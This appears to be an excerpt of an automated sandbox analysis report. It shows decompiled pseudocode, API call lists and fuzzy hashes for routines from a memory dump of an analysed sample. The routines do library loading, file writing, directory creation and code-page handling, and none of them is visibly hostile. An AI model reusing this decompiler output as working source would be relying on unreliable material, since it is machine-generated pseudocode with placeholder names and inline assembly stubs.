                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorLast$FileHandleRead
                                            • String ID:
                                            • API String ID: 2244327787-0
                                            • Opcode ID: de1e42e318b2668c923c954613840d0153de6811413ef6afcc140656eb1d7b5e
                                            • Instruction ID: 7dea6aa1bf6cf3b3673a1c2a6cb69a2bda9d4432e99f1a59df06484943cd0f09
                                            • Opcode Fuzzy Hash: de1e42e318b2668c923c954613840d0153de6811413ef6afcc140656eb1d7b5e
                                            • Instruction Fuzzy Hash: 9D117C30526608EFDBA05F62C947A6E77BDEB05361F10C529F83A851A0DBF48E40DF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C59A2C, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E00C59A2C(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xc90768 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xc65ba0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x13bcba53
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











                                            0x00c59a31
                                            0x00c59a35
                                            0x00c59a3c
                                            0x00c59a40
                                            0x00c59a4e
                                            0x00c59a5e
                                            0x00c59a64
                                            0x00c59a68
                                            0x00c59a91
                                            0x00c59a93
                                            0x00c59a97
                                            0x00c59a9a
                                            0x00c59a9a
                                            0x00c59aa0
                                            0x00c59aa2
                                            0x00000000
                                            0x00c59aa3
                                            0x00c59a6a
                                            0x00c59a73
                                            0x00c59a82
                                            0x00c59a75
                                            0x00c59a78
                                            0x00c59a7e
                                            0x00c59a7e
                                            0x00c59a86
                                            0x00000000
                                            0x00c59a88
                                            0x00c59a8b
                                            0x00c59a8d
                                            0x00000000
                                            0x00c59a8d
                                            0x00c59a86
                                            0x00c59a42
                                            0x00c59a47
                                            0x00000000

                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00C52E0F,00000000,00000000,?,00C599D3,00C52E0F,00000000,00000000,00000000,?,00C59BD0,00000006,FlsSetValue), ref: 00C59A5E
                                            • GetLastError.KERNEL32(?,00C599D3,00C52E0F,00000000,00000000,00000000,?,00C59BD0,00000006,FlsSetValue,00C66058,00C66060,00000000,00000364,?,00C585E8), ref: 00C59A6A
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C599D3,00C52E0F,00000000,00000000,00000000,?,00C59BD0,00000006,FlsSetValue,00C66058,00C66060,00000000), ref: 00C59A78
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: LibraryLoad$ErrorLast
                                            • String ID:
                                            • API String ID: 3177248105-0
                                            • Opcode ID: 3900f48fe4b5b53fe9937980fbb11e58e3ce8daa44aa95f2cbfbfc0551be1cef
                                            • Instruction ID: 2df8cd2ef624115cda9ef703ad966fffca2080f50edefa94a59abc69545d12d0
                                            • Opcode Fuzzy Hash: 3900f48fe4b5b53fe9937980fbb11e58e3ce8daa44aa95f2cbfbfc0551be1cef
                                            • Instruction Fuzzy Hash: CC01F73A245622EBC7318A7A9C44B5EBB98EF457A27200261FD56D3180D730DD45D6F4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C39C34, Relevance: 4.6, APIs: 3, Instructions: 96fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 92%
                                            			E00C39C34(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
				void* __ebp;
				int _t24;
				long _t32;
				void* _t36;
				void* _t42;
				void* _t52;
				intOrPtr* _t53;
				void* _t57;
				intOrPtr _t58;
				long _t59;

				_t52 = __edx;
				_t59 = _a8;
				_t53 = __ecx;
				if(_t59 != 0) {
					if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
						 *(_t53 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						_a8 = _a8 & 0x00000000;
						_t42 = 0;
						if( *((intOrPtr*)(_t53 + 0xc)) == 0) {
							goto L12;
						}
						_t57 = 0;
						if(_t59 == 0) {
							L14:
							if( *((char*)(_t53 + 0x14)) == 0 ||  *((intOrPtr*)(_t53 + 0xc)) != 0) {
								L21:
								 *((char*)(_t53 + 8)) = 1;
								return _t42;
							} else {
								_t56 = _t53 + 0x1e;
								if(E00C36C55(0xc700e0, _t53 + 0x1e, 0) == 0) {
									E00C36E9B(0xc700e0, _t59, 0, _t56);
									goto L21;
								}
								if(_a8 < _t59 && _a8 > 0) {
									_t58 =  *_t53;
									_t36 =  *((intOrPtr*)(_t58 + 0x14))(0);
									asm("sbb edx, 0x0");
									 *((intOrPtr*)(_t58 + 0x10))(_t36 - _a8, _t52);
								}
								continue;
							}
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_t32 = _t59 - _t57;
							if(_t32 >= 0x4000) {
								_t32 = 0x4000;
							}
							_t10 = WriteFile( *(_t53 + 4), _a4 + _t57, _t32,  &_a8, 0) - 1; // -1
							asm("sbb bl, bl");
							_t42 =  ~_t10 + 1;
							if(_t42 == 0) {
								goto L14;
							}
							_t57 = _t57 + 0x4000;
							if(_t57 < _t59) {
								continue;
							}
							L13:
							if(_t42 != 0) {
								goto L21;
							}
							goto L14;
						}
						goto L14;
						L12:
						_t24 = WriteFile( *(_t53 + 4), _a4, _t59,  &_a8, 0); // executed
						asm("sbb al, al");
						_t42 =  ~(_t24 - 1) + 1;
						goto L13;
					}
				}
				return 1;
			}













                                            0x00c39c34
                                            0x00c39c35
                                            0x00c39c3a
                                            0x00c39c3e
                                            0x00c39c4b
                                            0x00c39c55
                                            0x00c39c55
                                            0x00c39c5a
                                            0x00c39c5a
                                            0x00c39c5f
                                            0x00c39c65
                                            0x00000000
                                            0x00000000
                                            0x00c39c67
                                            0x00c39c6b
                                            0x00c39ccf
                                            0x00c39cd3
                                            0x00c39d2d
                                            0x00c39d30
                                            0x00000000
                                            0x00c39cdb
                                            0x00c39cdd
                                            0x00c39ced
                                            0x00c39d28
                                            0x00000000
                                            0x00c39d28
                                            0x00c39cf3
                                            0x00c39d04
                                            0x00c39d0a
                                            0x00c39d13
                                            0x00c39d18
                                            0x00c39d18
                                            0x00000000
                                            0x00c39cf3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c39c6d
                                            0x00c39c6d
                                            0x00c39c6f
                                            0x00c39c76
                                            0x00c39c78
                                            0x00c39c78
                                            0x00c39c95
                                            0x00c39c9a
                                            0x00c39c9c
                                            0x00c39c9f
                                            0x00000000
                                            0x00000000
                                            0x00c39ca1
                                            0x00c39ca9
                                            0x00000000
                                            0x00000000
                                            0x00c39ccb
                                            0x00c39ccd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c39ccd
                                            0x00000000
                                            0x00c39cad
                                            0x00c39cbc
                                            0x00c39cc5
                                            0x00c39cc9
                                            0x00000000
                                            0x00c39cc9
                                            0x00c39c5a
                                            0x00000000

                                            APIs
                                            • GetStdHandle.KERNEL32(000000F5,?,?,00C3C90A,00000001,?,?,?,00000000,00C44AF4,?,?,?,?,?,00C44599), ref: 00C39C4F
                                            • WriteFile.KERNEL32(?,00000000,?,00C447A1,00000000,?,?,00000000,00C44AF4,?,?,?,?,?,00C44599,?), ref: 00C39C8F
                                            • WriteFile.KERNELBASE(?,00000000,?,00C447A1,00000000,?,00000001,?,?,00C3C90A,00000001,?,?,?,00000000,00C44AF4), ref: 00C39CBC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileWrite$Handle
                                            • String ID:
                                            • API String ID: 4209713984-0
                                            • Opcode ID: 6a96affa4d3470e6a51ec80f1705cdd8c9388a544a4efd7ed83dec67c10ac476
                                            • Instruction ID: 64d0d393504133771713f46edce770a130ffcd9e734692cf53d9007da2b690a4
                                            • Opcode Fuzzy Hash: 6a96affa4d3470e6a51ec80f1705cdd8c9388a544a4efd7ed83dec67c10ac476
                                            • Instruction Fuzzy Hash: 22313971154209AFDB209F15E809BAAFBE8FF51311F008119F1A597590C7B4A949CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C39EF2, Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C39EF2(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E00C4D940();
				_t21 = _a4;
				_t8 =  *(E00C3B927(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E00C39E6B(_t21) != 0 || E00C3B32C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E00C3A12F(_t21, _a12); // executed
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}









                                            0x00c39efa
                                            0x00c39f00
                                            0x00c39f09
                                            0x00c39f0f
                                            0x00c39f23
                                            0x00c39f2b
                                            0x00c39f69
                                            0x00c39f6f
                                            0x00c39f72
                                            0x00c39f7e
                                            0x00c39f80
                                            0x00c39f74
                                            0x00c39f74
                                            0x00c39f77
                                            0x00000000
                                            0x00c39f79
                                            0x00c39f7b
                                            0x00c39f7b
                                            0x00c39f77
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c39f16
                                            0x00c39f19
                                            0x00c39f21
                                            0x00c39f56
                                            0x00c39f5a
                                            0x00c39f60
                                            0x00c39f60
                                            0x00c39f65
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c39f21
                                            0x00c39f85

                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00C39DFE,?,00000001,00000000,?,?), ref: 00C39F19
                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00C39DFE,?,00000001,00000000,?,?), ref: 00C39F4C
                                            • GetLastError.KERNEL32(?,?,?,?,00C39DFE,?,00000001,00000000,?,?), ref: 00C39F69
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateDirectory$ErrorLast
                                            • String ID:
                                            • API String ID: 2485089472-0
                                            • Opcode ID: 23f799ba7f9268bd7f1ba6846b81aa6e04d0ef5c4d271520afa53c4f18f1f207
                                            • Instruction ID: 783f8f7c4e207f5fee993fa405f42ebb89c2927ef332e5ab42f18f62cfcaa020
                                            • Opcode Fuzzy Hash: 23f799ba7f9268bd7f1ba6846b81aa6e04d0ef5c4d271520afa53c4f18f1f207
                                            • Instruction Fuzzy Hash: 1401B13163861466DB31ABE58C09BFE735CEF0E781F040451F951E60A1DBF4CE82D6A6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5A51E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C5A51E(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed char _v1828;
				signed int _t63;
				void* _t67;
				signed char _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t94;
				char* _t95;
				intOrPtr _t99;
				signed int _t100;

				_t93 = __edx;
				_t63 =  *0xc6d668; // 0x13bcba52
				_v8 = _t63 ^ _t100;
				_t99 = _a4;
				_t4 = _t99 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t99 + 0x119; // 0xc5ab69
					_t94 = _t47;
					_t88 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t94;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t95 = _t94 + _t88;
						_t69 = _t68 + _t95;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t95 = 0;
							} else {
								_t72 = _t99 + _t88;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t88 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t99 + _t88 + 0x19) =  *(_t99 + _t88 + 0x19) | 0x00000010;
							_t54 = _t88 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t95 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t99 + 0x119; // 0xc5ab69
						_t94 = _t61;
						_t88 = _t88 + 1;
						__eflags = _t88 - 0x100;
					} while (_t88 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t100 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t91 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t106 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t93 =  *(_t91 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t93;
							if(_t76 > _t93) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t100 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t91 = _t91 + 2;
						__eflags = _t91;
						_t75 =  *_t91;
					}
					_t13 = _t99 + 4; // 0x5efc4d8b
					E00C5B5EA(0, _t93, 0x100, _t99, _t106, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t99 + 4; // 0x5efc4d8b
					_t19 = _t99 + 0x21c; // 0x2ebf88b
					E00C597C2(0x100, _t99, _t106, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t99 + 4; // 0x5efc4d8b
					_t23 = _t99 + 0x21c; // 0x2ebf88b
					E00C597C2(0x100, _t99, _t106, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t92 = 0;
					do {
						_t68 =  *(_t100 + _t92 * 2 - 0x704) & 0x0000ffff;
						if((_t68 & 0x00000001) == 0) {
							__eflags = _t68 & 0x00000002;
							if((_t68 & 0x00000002) == 0) {
								 *(_t99 + _t92 + 0x119) = 0;
							} else {
								_t37 = _t99 + _t92 + 0x19;
								 *_t37 =  *(_t99 + _t92 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x304));
								goto L15;
							}
						} else {
							 *(_t99 + _t92 + 0x19) =  *(_t99 + _t92 + 0x19) | 0x00000010;
							_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x204));
							L15:
							 *(_t99 + _t92 + 0x119) = _t68;
						}
						_t92 = _t92 + 1;
					} while (_t92 < 0x100);
				}
				return E00C4E203(_t68, _v8 ^ _t100);
			}





























                                            0x00c5a51e
                                            0x00c5a529
                                            0x00c5a530
                                            0x00c5a535
                                            0x00c5a540
                                            0x00c5a552
                                            0x00c5a64a
                                            0x00c5a64a
                                            0x00c5a650
                                            0x00c5a652
                                            0x00c5a653
                                            0x00c5a653
                                            0x00c5a655
                                            0x00c5a65b
                                            0x00c5a65b
                                            0x00c5a65d
                                            0x00c5a65f
                                            0x00c5a668
                                            0x00c5a66b
                                            0x00c5a677
                                            0x00c5a67e
                                            0x00c5a68e
                                            0x00c5a680
                                            0x00c5a680
                                            0x00c5a683
                                            0x00c5a683
                                            0x00c5a683
                                            0x00c5a687
                                            0x00c5a687
                                            0x00000000
                                            0x00c5a687
                                            0x00c5a66d
                                            0x00c5a66d
                                            0x00c5a672
                                            0x00c5a672
                                            0x00c5a68a
                                            0x00c5a68a
                                            0x00c5a68a
                                            0x00c5a690
                                            0x00c5a696
                                            0x00c5a696
                                            0x00c5a69c
                                            0x00c5a69d
                                            0x00c5a69d
                                            0x00c5a558
                                            0x00c5a558
                                            0x00c5a55a
                                            0x00c5a55a
                                            0x00c5a561
                                            0x00c5a562
                                            0x00c5a566
                                            0x00c5a56c
                                            0x00c5a572
                                            0x00c5a59a
                                            0x00c5a59a
                                            0x00c5a59c
                                            0x00000000
                                            0x00000000
                                            0x00c5a57b
                                            0x00c5a57f
                                            0x00c5a591
                                            0x00c5a591
                                            0x00c5a593
                                            0x00000000
                                            0x00000000
                                            0x00c5a584
                                            0x00c5a586
                                            0x00c5a588
                                            0x00c5a590
                                            0x00c5a590
                                            0x00000000
                                            0x00c5a590
                                            0x00000000
                                            0x00c5a586
                                            0x00c5a595
                                            0x00c5a595
                                            0x00c5a598
                                            0x00c5a598
                                            0x00c5a59f
                                            0x00c5a5b4
                                            0x00c5a5ba
                                            0x00c5a5ce
                                            0x00c5a5d5
                                            0x00c5a5e4
                                            0x00c5a5f6
                                            0x00c5a5fd
                                            0x00c5a605
                                            0x00c5a607
                                            0x00c5a607
                                            0x00c5a611
                                            0x00c5a621
                                            0x00c5a623
                                            0x00c5a63a
                                            0x00c5a625
                                            0x00c5a625
                                            0x00c5a625
                                            0x00c5a625
                                            0x00c5a62a
                                            0x00000000
                                            0x00c5a62a
                                            0x00c5a613
                                            0x00c5a613
                                            0x00c5a618
                                            0x00c5a631
                                            0x00c5a631
                                            0x00c5a631
                                            0x00c5a641
                                            0x00c5a642
                                            0x00c5a646
                                            0x00c5a6b1

                                            APIs
                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00C5A543
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Info
                                            • String ID:
                                            • API String ID: 1807457897-3916222277
                                            • Opcode ID: dee4c755a892feaf036c98c96428684b42254696bcb681e7cc23c468b5af3b62
                                            • Instruction ID: 972d6ed79147ffa91efeac72b65e768193622cdb04b74c416c126a0aac9f5b49
                                            • Opcode Fuzzy Hash: dee4c755a892feaf036c98c96428684b42254696bcb681e7cc23c468b5af3b62
                                            • Instruction Fuzzy Hash: 9F417B745042489EDF228E26CC84FFABBF9EB05304F1805ECF99A87142D6359A89DF25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C31D61, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E00C31D61(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E00C4D870(E00C61173, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E00C3399D(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E00C316C0(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E00C31837(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E00C40FDE( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E00C41059( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E00C41094();
					}
					E00C31837(_t68, E00C52B33( *_t68));
					_t49 = 1;
				}
				E00C3159C(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}











                                            0x00c31d61
                                            0x00c31d61
                                            0x00c31d66
                                            0x00c31d6f
                                            0x00c31d73
                                            0x00c31d76
                                            0x00c31d79
                                            0x00c31d7c
                                            0x00c31d7f
                                            0x00c31d82
                                            0x00c31d8a
                                            0x00c31d90
                                            0x00c31d97
                                            0x00c31d9f
                                            0x00c31da7
                                            0x00c31db2
                                            0x00c31db5
                                            0x00c31db9
                                            0x00c31dbf
                                            0x00c31dc4
                                            0x00c31dce
                                            0x00c31de6
                                            0x00c31e07
                                            0x00c31de8
                                            0x00c31de8
                                            0x00c31df0
                                            0x00c31df9
                                            0x00c31df9
                                            0x00c31dd0
                                            0x00c31dd0
                                            0x00c31dd3
                                            0x00c31dd5
                                            0x00c31dd8
                                            0x00c31dd8
                                            0x00c31e17
                                            0x00c31e1d
                                            0x00c31e1f
                                            0x00c31e23
                                            0x00c31e2e
                                            0x00c31e38

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C31D66
                                              • Part of subcall function 00C3399D: __EH_prolog.LIBCMT ref: 00C339A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: CMT
                                            • API String ID: 3519838083-2756464174
                                            • Opcode ID: da8f72abf7aadeb76f0a90e47983b2e02ab293407a93ca45e76f6e5e123c93f7
                                            • Instruction ID: 257267ccc11984b085f23aa96bce75ee4e540da1e3a8fcbfe499e448b9db4774
                                            • Opcode Fuzzy Hash: da8f72abf7aadeb76f0a90e47983b2e02ab293407a93ca45e76f6e5e123c93f7
                                            • Instruction Fuzzy Hash: 8E2177769102089FCB15EF99C941AEEFBF6FF09300F1804AEE855A7251CB325E41DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C59C64, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E00C59C64(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				int _t22;
				intOrPtr* _t30;
				signed int _t32;

				_t25 = __ecx;
				_push(__ecx);
				_t18 =  *0xc6d668; // 0x13bcba52
				_v8 = _t18 ^ _t32;
				_push(__esi);
				_t20 = E00C59990(0x16, "LCMapStringEx", 0xc66084, "LCMapStringEx"); // executed
				_t30 = _t20;
				if(_t30 == 0) {
					_t22 = LCMapStringW(E00C59CEC(_t25, _t30, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xc62260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					_t22 =  *_t30();
				}
				return E00C4E203(_t22, _v8 ^ _t32);
			}









                                            0x00c59c64
                                            0x00c59c69
                                            0x00c59c6a
                                            0x00c59c71
                                            0x00c59c74
                                            0x00c59c86
                                            0x00c59c8b
                                            0x00c59c92
                                            0x00c59cd5
                                            0x00c59c94
                                            0x00c59cb1
                                            0x00c59cb7
                                            0x00c59cb7
                                            0x00c59ce9

                                            APIs
                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 00C59CD5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: String
                                            • String ID: LCMapStringEx
                                            • API String ID: 2568140703-3893581201
                                            • Opcode ID: 3b74f86a01b565f69461a81de4cc3e0e396a76f23a038b093f1c4c1984404faf
                                            • Instruction ID: 4ce97fa3f9836f294675633b76fd5f7531bc910017003a1080608769f94ea3e2
                                            • Opcode Fuzzy Hash: 3b74f86a01b565f69461a81de4cc3e0e396a76f23a038b093f1c4c1984404faf
